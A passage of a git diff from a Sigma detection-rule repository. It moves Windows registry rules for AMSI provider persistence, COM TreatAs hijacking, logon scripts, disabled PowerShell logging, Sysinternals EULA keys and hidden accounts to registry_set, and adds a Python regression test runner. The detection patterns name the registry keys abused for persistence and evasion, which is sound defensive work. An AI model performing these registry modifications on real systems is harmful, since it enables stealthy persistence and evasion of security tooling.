Interface) protections. + Attackers may add custom AMSI providers to persist on the system and evade detection by security software that relies on AMSI for scanning scripts and other content. + This technique is often used in conjunction with fileless malware and script-based attacks to maintain persistence while avoiding detection. +references: + - https://persistence-info.github.io/Data/amsi.html + - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022-07-21 +modified: 2025-10-26 +tags: + - attack.persistence +logsource: + category: registry_set + product: windows +detection: + selection: + TargetObject|contains: + - '\SOFTWARE\Microsoft\AMSI\Providers\' + - '\SOFTWARE\WOW6432Node\Microsoft\AMSI\Providers\' + filter_optional_avast: + Image: + - 'C:\Program Files\Avast Software\Avast\RegSvr.exe' + - 'C:\Program Files\Avast Software\Avast\x86\RegSvr.exe' + TargetObject|contains: '\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}' + filter_optional_avg: + Image: + - 'C:\Program Files\AVG\Antivirus\RegSvr.exe' + - 'C:\Program Files\AVG\Antivirus\x86\RegSvr.exe' + TargetObject|contains: '\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}' + filter_optional_avira: + Image: 'C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe' + TargetObject|contains: '\{00000001-3DCC-4B48-A82E-E2071FE58E05}' + condition: selection and not 1 of filter_optional_* +falsepositives: + - Legitimate security products adding their own AMSI providers. Filter these according to your environment. +level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml diff --git a/rules/windows/registry/registry_add/registry_add_persistence_com_key_linking.yml b/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking.yml similarity index 70% rename from rules/windows/registry/registry_add/registry_add_persistence_com_key_linking.yml rename to rules/windows/registry/registry_set/registry_set_persistence_com_key_linking.yml index 788fe0c7a..620ca6b2d 100644 --- a/rules/windows/registry/registry_add/registry_add_persistence_com_key_linking.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking.yml @@ -6,26 +6,31 @@ references: - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ author: Kutepov Anton, oscd.community date: 2019-10-23 -modified: 2023-02-07 +modified: 2025-10-26 tags: - attack.privilege-escalation - attack.persistence - attack.t1546.015 logsource: - category: registry_add + category: registry_set product: windows detection: selection: - EventType: 'CreateKey' # Don't want DeleteKey events TargetObject|contains|all: - 'HKU\' - 'Classes\CLSID\' - '\TreatAs' - filter_svchost: + filter_main_svchost: # Example of target object by svchost # TargetObject: HKU\S-1-5-21-1098798288-3663759343-897484398-1001_Classes\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs Image: 'C:\WINDOWS\system32\svchost.exe' - condition: selection and not 1 of filter_* + condition: selection and not 1 of filter_main_* falsepositives: - Maybe some system utilities in rare cases use linking keys for backward compatibility level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml +simulation: + - type: atomic-red-team + name: COM hijacking via TreatAs + technique: T1546.015 + atomic_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9 diff --git a/rules/windows/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml b/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript.yml similarity index 71% rename from rules/windows/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml rename to rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript.yml index b112c18e0..634d44626 100644 --- a/rules/windows/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript.yml @@ -6,20 +6,25 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md author: Tom Ueltschi (@c_APT_ure) date: 2019-01-12 -modified: 2023-06-09 +modified: 2025-10-26 tags: - attack.privilege-escalation - attack.t1037.001 - attack.persistence - attack.lateral-movement logsource: - category: registry_add + category: registry_set product: windows detection: selection: - EventType: CreateKey TargetObject|contains: 'UserInitMprLogonScript' condition: selection falsepositives: - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml +simulation: + - type: atomic-red-team + name: Logon Scripts + technique: T1037.001 + atomic_guid: d6042746-07d4-4c92-9ad8-e644c114a231 diff --git a/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml b/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml index b86391a83..55ca978dc 100644 --- a/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml +++ b/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml @@ -10,6 +10,8 @@ modified: 2023-08-17 tags: - attack.defense-evasion - attack.t1564.001 + - attack.t1112 + - attack.persistence logsource: category: registry_set product: windows @@ -30,3 +32,9 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml +simulation: + - type: atomic-red-team + name: Disable PowerShell Logging via Registry + technique: T1112 + atomic_guid: 95b25212-91a7-42ff-9613-124aca6845a8 diff --git a/rules/windows/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml b/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula.yml similarity index 78% rename from rules/windows/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml rename to rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula.yml index 7266dd352..a0671e152 100644 --- a/rules/windows/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml +++ b/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula.yml @@ -6,19 +6,19 @@ references: - https://twitter.com/Moti_B/status/1008587936735035392 author: Markus Neis date: 2017-08-28 -modified: 2023-02-07 +modified: 2025-10-26 tags: - attack.resource-development - attack.t1588.002 logsource: product: windows - category: registry_add + category: registry_set detection: selection: - EventType: CreateKey TargetObject|endswith: '\EulaAccepted' condition: selection falsepositives: - Legitimate use of SysInternals tools - Programs that use the same Registry Key level: low +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml diff --git a/rules/windows/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml b/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula.yml similarity index 91% rename from rules/windows/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml rename to rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula.yml index 5272fa58e..99999b520 100644 --- a/rules/windows/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml +++ b/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula.yml @@ -11,16 +11,15 @@ references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) date: 2022-08-24 -modified: 2023-02-07 +modified: 2025-10-26 tags: - attack.resource-development - attack.t1588.002 logsource: product: windows - category: registry_add + category: registry_set detection: selection: - EventType: CreateKey TargetObject|contains: # Please add new values while respecting the alphabetical order - '\Active Directory Explorer' @@ -66,3 +65,4 @@ detection: falsepositives: - Unlikely level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml diff --git a/rules/windows/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml b/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula.yml similarity index 87% rename from rules/windows/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml rename to rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula.yml index 0ab8b80cd..2c3c8b2cb 100644 --- a/rules/windows/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml +++ b/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula.yml @@ -11,16 +11,15 @@ references: - https://twitter.com/Moti_B/status/1008587936735035392 author: Nasreddine Bencherchali (Nextron Systems) date: 2022-08-24 -modified: 2023-02-07 +modified: 2025-10-26 tags: - attack.resource-development - attack.t1588.002 logsource: product: windows - category: registry_add + category: registry_set detection: selection: - EventType: CreateKey TargetObject|contains: - '\Active Directory Explorer' - '\Handle' @@ -37,3 +36,4 @@ detection: falsepositives: - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml diff --git a/rules/windows/registry/registry_set/registry_set_special_accounts.yml b/rules/windows/registry/registry_set/registry_set_special_accounts.yml index e2cf16462..f14e232b1 100644 --- a/rules/windows/registry/registry_set/registry_set_special_accounts.yml +++ b/rules/windows/registry/registry_set/registry_set_special_accounts.yml @@ -9,7 +9,7 @@ status: test description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ - - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md + - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md#atomic-test-3---create-hidden-user-in-registry author: Nasreddine Bencherchali (Nextron Systems), frack113 date: 2022-07-12 modified: 2023-01-26 @@ -27,3 +27,9 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_special_accounts/info.yml +simulation: + - type: atomic-red-team + name: Create Hidden User in Registry + technique: T1564.002 + atomic_guid: 173126b7-afe4-45eb-8680-fa9f6400431c diff --git a/rules/windows/sysmon/sysmon_config_modification.yml b/rules/windows/sysmon/sysmon_config_modification.yml index 5e190f95b..e2421d4ac 100644 --- a/rules/windows/sysmon/sysmon_config_modification.yml +++ b/rules/windows/sysmon/sysmon_config_modification.yml @@ -22,3 +22,4 @@ detection: falsepositives: - Legitimate administrative action level: medium +regression_tests_path: regression_data/windows/sysmon/sysmon_config_modification/info.yml diff --git a/tests/regression_tests_runner.py b/tests/regression_tests_runner.py new file mode 100644 index 000000000..04b22daa2 --- /dev/null +++ b/tests/regression_tests_runner.py @@ -0,0 +1,566 @@ +"""Run regression tests for Sigma rules based on their regression_tests_path attribute.""" + +import argparse +import json +import os +import subprocess +import sys +from typing import Dict, List + +import yaml + + +def get_absolute_path(base_path: str, relative_path: str) -> str: + """Convert a relative path to an absolute path based on a base path.""" + if os.path.isabs(relative_path): + return relative_path + + # Normalize path separators + relative_path = relative_path.replace("/", os.sep).replace("\\", os.sep) + workspace_root = base_path + while not os.path.exists(os.path.join(workspace_root, relative_path)): + parent = os.path.dirname(workspace_root) + if parent == workspace_root: # Reached filesystem root + break + workspace_root = parent + return os.path.join(workspace_root, relative_path) + + +def load_info_yaml( + regression_tests_path: str, rule_id: str, file_path: str +) -> tuple[List[Dict], List[Dict]]: + """Load and parse the regression test info YAML file.""" + results = [] + missing_files = [] + + if not os.path.exists(regression_tests_path): + missing_files.append( + { + "rule_path": file_path, + "rule_id": rule_id, + "missing_file": regression_tests_path, + "file_type": "regression_tests_path", + } + ) + return results, missing_files + + try: + with open(regression_tests_path, "r", encoding="utf-8") as f: + info_data = yaml.safe_load(f) + + if not info_data or "regression_tests_info" not in info_data: + print(f"Warning: No regression_tests_info found in {regression_tests_path}") + return results, missing_files + + # Extract test data from regression_tests_info + test_data = [] + regression_tests = info_data.get("regression_tests_info", []) + + for test in regression_tests: + if not isinstance(test, dict): + continue + + test_path = get_absolute_path( + os.path.dirname(file_path), test.get("path", "") + ) + + # Check if test file exists + if not os.path.exists(test_path): + missing_files.append( + { + "rule_path": file_path, + "rule_id": rule_id, + "missing_file": test_path, + "file_type": "test_file", + "test_name": test.get("name", "Unnamed Test"), + "test_type": test.get("type", "unknown"), + } + ) + + test_data.append( + { + "type": test.get("type", "unknown"), + "path": test_path, + "name": test.get("name", "Unnamed Test"), + "provider": test.get("provider", ""), + } + ) + + if test_data: + results.append( + { + "path": file_path, + "id": rule_id, + "tests": test_data, + } + ) + + except yaml.YAMLError as e: + print(f"Warning: Could not parse info file {regression_tests_path}: {e}") + + return results, missing_files + + +def find_rule_missing_test(rule_data: Dict, file_path: str) -> tuple[bool, List[Dict]]: + """Find missing test files for a single rule based on its data. + + Returns: + skip: True if the rule should be skipped, False otherwise + missing_regression_tests_path: List of dicts with missing regression_tests_path info + + """ + missing_regression_tests_path = [] + rule_id = rule_data.get("id", "unknown") + rule_status = rule_data.get("status", "").lower() + + # Check if rule status requires regression tests + requires_regression_tests = rule_status in ["test", "stable"] + + # Check if rule has regression_tests_path + has_regression_tests_path = "regression_tests_path" in rule_data + + # If rule requires regression tests but doesn't have regression_tests_path + if requires_regression_tests and not has_regression_tests_path: + missing_regression_tests_path.append( + { + "rule_path": file_path, + "rule_id": rule_id, + "status": rule_status, + } + ) + return True, missing_regression_tests_path + + # Skip rules that don't require regression tests + # and don't have regression_tests_path + if not requires_regression_tests and not has_regression_tests_path: + return True, missing_regression_tests_path + return False, missing_regression_tests_path + + +def find_rule_tests(rule_data: Dict, file_path: str) -> tuple[List[Dict], List[Dict]]: + """Find regression tests and missing files for a single rule based on its data.""" + results = [] + missing_files = [] + rule_id = rule_data.get("id", "unknown") + + if rule_data and "regression_tests_path" in rule_data: + regression_tests_path = get_absolute_path( + os.path.dirname(file_path), + rule_data.get("regression_tests_path", ""), + ) + + # Load the info.yml file + yml_result, yml_missing_files = load_info_yaml( + regression_tests_path, rule_id, file_path + ) + results.extend(yml_result) + missing_files.extend(yml_missing_files) + return results, missing_files + + +# pylint: disable=too-many-locals +def find_rules_with_tests( + rules_paths: List[str], +) -> tuple[List[Dict], List[Dict], List[Dict]]: + """Find all rules that have a 'regression_tests_path' attribute pointing to test info files. + + Returns: + tuple: (rules_with_tests, missing_files, missing_regression_tests_path) + """ + results = [] + missing_files = [] + missing_regression_tests_path = [] + + for rules_path in rules_paths: + if not os.path.exists(rules_path): + print(f"Warning: Rules path {rules_path} does not exist") + continue + + for root, _, files in os.walk(rules_path): + for file in files: + if not file.endswith(".yml"): + continue + + file_path = os.path.join(root, file) + try: + with open(file_path, "r", encoding="utf-8") as f: + rule_data = yaml.safe_load(f) + + if not rule_data: + continue + + # Check for missing regression_tests_path + skip, missing_test = find_rule_missing_test(rule_data, file_path) + missing_regression_tests_path.extend(missing_test) + if skip: + continue + + # Find tests for the rule + ( + result, + missing_file, + ) = find_rule_tests(rule_data, file_path) + results.extend(result) + missing_files.extend(missing_file) + + except yaml.YAMLError as e: + print(f"Warning: Could not parse {file_path}: {e}") + + return results, missing_files, missing_regression_tests_path + + +def run_evtx_checker( + rule_path: str, + rule_id: str, + test_data: Dict, + evtx_checker_path: str, + thor_config: str, +) -> tuple[bool, str]: + """Run evtx-sigma-checker and check if rule ID is in output.""" + evtx_path = test_data["path"] + + # File existence is now checked upfront in find_rules_with_tests + # No need to check again here + + cmd = [ + evtx_checker_path, + "--log-source", + thor_config, + "--evtx-path", + evtx_path, + "--rule-level", + "informational", + "--rule-path", + os.path.dirname(rule_path), + ] + + try: + result = subprocess.run( + cmd, capture_output=True, text=True, timeout=300, check=True + ) + + if result.returncode != 0: + print(f" Warning: evtx-sigma-checker failed: {result.stderr}") + return False, "" + + # Check if rule ID appears in output + output_lines = result.stdout.strip().splitlines() + found_match = False + match_output = "" + + for line in output_lines: + try: + json_obj = json.loads(line) + if json_obj.get("RuleId") == rule_id: + found_match = True + match_output = line + break + except json.JSONDecodeError: + # Skip lines that aren't valid JSON + print(f" Warning: Skipping non-JSON line: {line}") + continue + + return found_match, match_output + + except subprocess.TimeoutExpired: + print(" Timeout: evtx-sigma-checker timed out") + return False, "" + except subprocess.CalledProcessError as e: + print(f" Error running evtx-sigma-checker: {e}") + return False, "" + + +def run_test( + rule_path: str, + rule_id: str, + test_data: Dict, + evtx_checker_path: str, + thor_config: str, +) -> tuple[bool, str]: + """Run a test based on its type.""" + test_type = test_data.get("type", "unknown") + + if test_type == "evtx": + return run_evtx_checker( + rule_path, rule_id, test_data, evtx_checker_path, thor_config + ) + print(f" Warning: Unknown test type '{test_type}', skipping") + return False, "" + + +def parse_arguments() -> argparse.Namespace: + """Parse command-line arguments.""" + parser = argparse.ArgumentParser( + description="Run regression tests for Sigma rules with regression_tests_path" + ) + + parser.add_argument( + "--rules-paths", + required=True, + action="extend", + nargs="+", + help="Comma-separated paths to rule directories", + ) + + parser.add_argument( + "--evtx-checker", + help="Path to evtx-sigma-checker binary (required unless using --validate-only)", + ) + + parser.add_argument( + "--thor-config", + help="Path to thor.yml configuration file (required unless using --validate-only)", + ) + + parser.add_argument( + "--validate-only", + action="store_true", + help="Only validate rule status requirements without running tests", + ) + + parser.add_argument( + "--ignore-validation", + action="store_true", + help="Ignore rule status validation requirements", + ) + + parser.add_argument( + "--verbose", + action="store_true", + help="Enable verbose output, showing successful test results as well", + ) + + return parser.parse_args() + + +def init_checks(args: argparse.Namespace) -> None: + """Initialization that checks for functional environment.""" + if args.validate_only: + print("Starting Rule Status Validation...") + else: + print("Starting Regression Tests...") + + # Check required arguments for test execution + if not args.evtx_checker or not args.thor_config: + print( + "Error: --evtx-checker and --thor-config are required unless using --validate-only" + ) + sys.exit(1) + + # Check if evtx-sigma-checker exists + if not os.path.exists(args.evtx_checker): + print(f"Error: evtx-sigma-checker not found at {args.evtx_checker}") + sys.exit(1) + + # Check if THOR config exists + if not os.path.exists(args.thor_config): + print(f"Error: Thor config not found at {args.thor_config}") + sys.exit(1) + print(f"Rules paths: {args.rules_paths}") + + if not args.validate_only: + print(f"EVTX checker: {args.evtx_checker}") + print(f"Thor config: {args.thor_config}") + print() + + +# pylint: disable=too-many-locals +def run_tests( + args: argparse.Namespace, rules_with_tests +) -> tuple[int, int, List[Dict]]: + """Run tests for all rules with test data.""" + total_tests = 0 + passed_tests = 0 + failures = [] + for rule_info in rules_with_tests: + rule_path = rule_info["path"] + rule_id = rule_info["id"] + tests = rule_info["tests"] + + if args.verbose: + print(f"\nTesting rule: {rule_id}") + print(f" File: {rule_path}") + + for i, test_data in enumerate(tests): + test_name = test_data.get("name", f"Test {i+1}") + test_type = test_data.get("type", "unknown") + test_path = test_data.get("path", "unknown") + + if args.verbose: + print(f" {test_name} (type: {test_type}): {test_path}") + total_tests += 1 + + success, output = run_test( + rule_path, rule_id, test_data, args.evtx_checker, args.thor_config + ) + + if success: + passed_tests += 1 + if args.verbose: + print(f" ✓ PASS - Match found for Rule ID: {rule_id}\n") + print(f" Output: {output}") + else: + failures.append( + { + "rule_id": rule_id, + "rule_path": rule_path, + "test_name": test_name, + "test_type": test_type, + "test_path": test_path, + "test_number": i + 1, + } + ) + if args.verbose: + print(" ✗ FAIL") + + if args.verbose: + print() + return total_tests, passed_tests, failures + + +def validate_missing_tests( + args: argparse.Namespace, + rules_with_tests: List[Dict], + missing_regression_tests_path: List[Dict], +) -> None: + """Print rules missing regression_tests_path and handle validation.""" + + # Check for missing regression_tests_path in test/stable rules + if missing_regression_tests_path and not args.ignore_validation: + print() + print("-" * 50) + print("RULES MISSING REGRESSION_TESTS_PATH:") + print("-" * 50) + for missing in missing_regression_tests_path: + print(f"Rule: {missing['rule_id']} (status: {missing['status']})") + print(f" File: {missing['rule_path']}") + print() + print("=" * 70) + print( + "Rules with status 'test' or 'stable' must have a 'regression_tests_path' field." + ) + print("Please add regression tests for these rules or change their status.") + print("=" * 70) + print( + f"\nERROR: Found {len(missing_regression_tests_path)} " + "test/stable rule(s) without regression_tests_path." + ) + + sys.exit(1) + elif missing_regression_tests_path and args.ignore_validation: + print( + f"\nWARNING: Found {len(missing_regression_tests_path)} " + "test/stable rule(s) without regression_tests_path (validation ignored)" + ) + print( + "Consider adding regression tests for these rules " + "or changing their status to 'experimental'." + ) + + # If validate-only mode, exit successfully after validation + if args.validate_only: + if args.ignore_validation and missing_regression_tests_path: + print("✅ All rules passed validation (validation ignored)!") + else: + print("✅ All rules passed validation!") + print(f"Found {len(rules_with_tests)} rules with regression tests configured.") + sys.exit(0) + + +def check_missing_test_files(missing_files: List[Dict]) -> None: + """Check for missing test files and print errors if any are found.""" + if not missing_files: + return + + print(f"\nERROR: Found {len(missing_files)} missing file(s):") + print("=" * 60) + + regression_test_files = [ + f for f in missing_files if f["file_type"] == "regression_tests_path" + ] + test_files = [f for f in missing_files if f["file_type"] == "test_file"] + + if regression_test_files: + print(f"\nMISSING REGRESSION TEST INFO FILES ({len(regression_test_files)}):") + print("-" * 50) + for missing in regression_test_files: + print(f"Rule: {missing['rule_id']}") + print(f" File: {missing['rule_path']}") + print(f" Missing: {missing['missing_file']}") + print() + + if test_files: + print(f"\nMISSING TEST DATA FILES ({len(test_files)}):") + print("-" * 50) + for missing in test_files: + print(f"Rule: {missing['rule_id']}") + print(f" File: {missing['rule_path']}") + print(f" Test: {missing['test_name']} (type: {missing['test_type']})") + print(f" Missing: {missing['missing_file']}") + print() + + print("=" * 60) + print("Please ensure all referenced files exist before running tests.") + sys.exit(1) + + +def print_summary(total_tests: int, passed_tests: int, failures: List[Dict]) -> None: + """Print a summary of the test results.""" + print("=" * 60) + print("REGRESSION TEST SUMMARY") + print("=" * 60) + print(f"Total tests run: {total_tests}") + print(f"Passed: {passed_tests}") + print(f"Failed: {len(failures)}") + + if total_tests > 0: + success_rate = (passed_tests / total_tests) * 100 + print(f"Success rate: {success_rate:.1f}%") + + # Print failures + if failures: + print(f"\nFAILED TESTS ({len(failures)}):") + print("-" * 40) + for failure in failures: + print(f"Rule: {failure['rule_id']}") + print(f" File: {failure['rule_path']}") + print(f" Test: {failure['test_name']} (type: {failure['test_type']})") + print(f" Path: {failure['test_path']}") + print() + + print("=" * 60) + + +def main(): + """Main function to run regression tests for Sigma rules.""" + args = parse_arguments() + init_checks(args) + + # Find rules with tests + print("Scanning for rules with test data...") + rules_with_tests, missing_files, missing_regression_tests_path = ( + find_rules_with_tests(args.rules_paths) + ) + print(f"Found {len(rules_with_tests)} rules with test data") + + validate_missing_tests(args, rules_with_tests, missing_regression_tests_path) + check_missing_test_files(missing_files) + print() + + if not rules_with_tests: + print("No rules with test data found") + sys.exit(1) + + # Test each rule + print("Running tests...\n") + total_tests, passed_tests, failures = run_tests(args, rules_with_tests) + + print_summary(total_tests, passed_tests, failures) + + # Exit with error code if any tests failed + if failures: + sys.exit(1) + + +if __name__ == "__main__": + main() diff --git a/tests/thor.yml b/tests/thor.yml index 29222a425..d1572c849 100644 --- a/tests/thor.yml +++ b/tests/thor.yml @@ -138,7 +138,7 @@ logsources: rewrite: product: windows service: sysmon - registry_delete: + registry_delete_key: category: registry_delete product: windows conditions: @@ -147,6 +147,15 @@ logsources: rewrite: product: windows service: sysmon + registry_delete_value: + category: registry_delete + product: windows + conditions: + EventID: 12 + EventType: DeleteValue + rewrite: + product: windows + service: sysmon registry_set: category: registry_set product: windows